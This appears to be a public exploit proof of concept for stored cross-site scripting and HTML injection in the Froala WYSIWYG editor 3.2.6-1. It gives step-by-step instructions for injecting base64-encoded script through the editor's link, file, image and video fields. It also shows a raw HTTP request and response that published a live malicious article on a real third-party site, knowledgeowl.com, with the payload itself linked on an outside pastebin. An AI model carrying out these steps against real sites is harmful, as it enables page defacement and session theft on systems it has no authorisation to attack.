# Exploit Title: Stored XSS and Html Code Injection Editor Froala # Version 3.2.6-1 # Date:06.03.2021 # Author: Vincent666 ibn Winnie # Software Link: https://froala.com/wysiwyg-editor/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ PoC: In the Froala I used xss code in base 64 and some tags for html code injection. Vuln Fields: Embed Url,Insert Link,Insert Files,Insert Video,etc. Example with Insert Files or Insert Image: Click browse files – choose file img from computer Insert on page , click on image and choose Insert Link and paste XSS code: And insert! We have stored xss + full html code Injection deface page. XSS Code: https://pastebin.com/jUUXQbzs Video with XSS and Html Code Injection: https://www.youtube.com/watch?v=QO2XiR8N1P0 All fields with xss in base64 vulnerable to XSS. You can use method Get or Post. Encode your xss is here: https://www.base64encode.org/ For Html Code Injection i use tags: Table,Div,span,style,body and another. Pictures: https://imgur.com/a/WIfQQw5 https://imgur.com/a/P59ePrm https://imgur.com/a/Ksc5VWX Simple example on knowledgeowl.com: (They use Froala) Create new article and in editor choose and press "Code View": Paste xss code and again press "Code View" and save this. Example link : https://test345.knowledgeowl.com/help/asxdcfvgbvnm (Link works only 1 months) https://app.knowledgeowl.com/kb/article-edit-save Host: app.knowledgeowl.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------116499600342865829691384395973 Content-Length: 4793 Origin: https://app.knowledgeowl.com Connection: keep-alive Referer: https://app.knowledgeowl.com/kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f Cookie: (i delete this) Upgrade-Insecure-Requests: 1 article-id=60464e9e8e121c1923587f5f&project_id=6043b120ec161c7539dea231&language=en¤t_version=60464f2a8e121c172358807e&version=&category=&content_article=&linked_article=&dopen=1615238721&save-action=default&url_hash=asxdcfvgbvnm&title=asxdcfvgbvnm&toc_title=&internal_title=&art-redirect-url=&art-redirect-newtab=true&content=

"">

&meta_page_title=&meta_description=&status=published&date_published=&author=6043b10eec161c8d39dea36f&visibility=public&callout=none&callout_expire=03/15/2021&version_type=&custom-version=&version_note=&related-id[]=&application_screens=&csrf-token=af5366a45b186b5407fb55a1285b0f6ece862e25a46ebcfc070ab1d146b8b990 POST: HTTP/1.1 302 Found Date: Mon, 08 Mar 2021 16:25:33 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: _authbysession=90d12858ba2ea25a0ad42782; expires=Mon, 08-Mar-2021 18:25:33 GMT; Max-Age=7200; path=/; domain=app.knowledgeowl.com; secure; httponly Location: /kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 21 Content-Type: text/html; charset=UTF-8 The final results in a simple form: We can use different fields in Froal's editor using cross site scripting and html/iframe code injection in base 64.